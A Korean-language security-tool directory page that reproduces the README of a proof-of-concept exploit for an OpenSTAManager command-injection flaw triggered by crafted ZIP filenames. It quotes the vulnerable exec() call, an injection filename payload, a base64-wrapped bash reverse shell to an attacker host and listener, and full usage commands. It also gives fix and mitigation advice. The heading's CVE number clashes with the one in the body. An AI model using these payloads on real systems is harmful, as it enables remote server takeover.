Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-69212 — Python poc, exploit for CVE-2025-69212 | Kitploit
도구/GitHubGitHub/c0gnit00/cve-2026-69212
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubc0gnit00/cve-2026-69212

CVE-2026-69212

Python poc, exploit for CVE-2025-69212

저장소 보기
21개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-69212 — OpenSTAManager OS 명령어 삽입 (RCE)

CVE-2025-69212에 대한 개념 증명 익스플로잇으로, OpenSTAManager <= 2.9.8에서 악의적으로 조작된 ZIP 파일 업로드를 통해 인증된 공격자가 원격 코드 실행을 달성할 수 있는 OS 명령어 삽입 취약점입니다.

권고

  • CVE: CVE-2025-69212
  • GHSA: GHSA-25fp-8w8p-mx36
  • 영향받는 버전: OpenSTAManager <= 2.9.8
  • 수정된 버전: OpenSTAManager 2.9.9+
  • CVSS: 치명적

취약점 세부 정보

이 취약점은 src/Util/XML.php의 약 100번째 줄에 존재하며, 애플리케이션이 사용자가 제어하는 파일명을 소독 없이 셸 exec() 호출에 직접 전달합니다:

root@kitploit:~
exec('openssl smime -verify -noverify -in "' . $file . '" -inform DER -out "' . $output_file . '"');

ZIP 아카이브가 importFE_ZIP 플러그인을 통해 업로드되면 (/actions.php), 애플리케이션이 ZIP을 추출하고 각 .p7m 항목의 파일명을 exec()에 전달합니다. 공격자는 큰따옴표로 묶인 인수에서 빠져나와 임의의 셸 명령어를 삽입하는 악성 파일명으로 ZIP을 조작할 수 있습니다.

삽입 페이로드 (파일명):

root@kitploit:~
invoice.p7m";<COMMAND>;echo ".p7m

결과적인 셸 실행:

root@kitploit:~
openssl smime ... -in "invoice.p7m";<COMMAND>;echo ".p7m" ...
#                                   ^^^^^^^^^^^^ 여기에 삽입됨

참고: ZipArchive::extractTo()가 슬래시 /를 경로 구분자로 처리하기 때문에 파일명에 직접 슬래시를 포함할 수 없습니다. PoC는 리버스 셸 페이로드를 base64로 인코딩하여 이 문제를 회피합니다.


요구 사항

  • Python 3.x
  • requests 라이브러리
  • 유효한 OpenSTAManager 자격 증명 (가져오기 플러그인에 접근할 수 있는 모든 역할)
  • 공격자 머신의 리스너 (예: nc)

의존성 설치:

root@kitploit:~
pip install requests

사용법

root@kitploit:~
python3 CVE-2025-69212.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> --lhost <YOUR_IP> --lport <YOUR_PORT>

옵션

예시

root@kitploit:~
# 리스너 시작
nc -lvnp 4444

# 익스플로잇 실행
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444

# Burp Suite를 통해 경로 설정
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444 --proxy http://127.0.0.1:8080

작동 원리

  1. 인증 — 제공된 자격 증명을 사용하여 OpenSTAManager에 로그인
  2. 페이로드 구성 — 삽입된 명령어를 포함하는 파일명을 가진 .p7m 파일이 포함된 ZIP 아카이브 생성
  3. Base64 인코딩 — 리버스 셸 (bash -i >& /dev/tcp/LHOST/LPORT 0>&1)은 파일명에 슬래시가 포함되지 않도록 base64로 인코딩됨
  4. 업로드 — importFE_ZIP 플러그인을 통해 /actions.php로 ZIP을 POST
  5. 실행 — 서버가 ZIP을 추출하고 악성 파일명을 exec()에 전달하여 리버스 셸 트리거
  6. 스레딩 — bash가 HTTP 연결을 열어두므로 업로드는 데몬 스레드에서 실행됨; 스크립트는 응답을 기다리지 않고 정리 종료

수정 방법

파일명을 셸 명령어에 전달하기 전에 소독하는 OpenSTAManager 2.9.9 이상으로 업데이트하십시오.

즉시 패치를 적용할 수 없는 경우, importFE_ZIP 플러그인을 비활성화하거나 신뢰할 수 있는 사용자만 /actions.php에 접근할 수 있도록 제한하십시오.


면책 조항

이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용됩니다. 사용자가 소유하거나 테스트에 대한 명시적인 서면 허가를 받은 시스템에서만 사용하십시오. 사용자가 소유하지 않은 시스템에 대한 무단 사용은 불법이며 비윤리적입니다. 작성자는 이 도구의 오용이나 이로 인한 손해에 대해 책임을 지지 않습니다.


참고 자료

  • GHSA-25fp-8w8p-mx36
  • OpenSTAManager GitHub
  • NVD - CVE-2025-69212
도구 다운로드
인자필수설명
-u, --url예대상 기본 URL (예: http://target.htb)
-U, --username예OpenSTAManager 사용자 이름
-P, --password예OpenSTAManager 비밀번호
--lhost예리버스 셸을 위한 사용자 IP 주소
--lport예리버스 셸을 위한 사용자 리스닝 포트
--proxy아니오HTTP 프록시 (예: http://127.0.0.1:8080)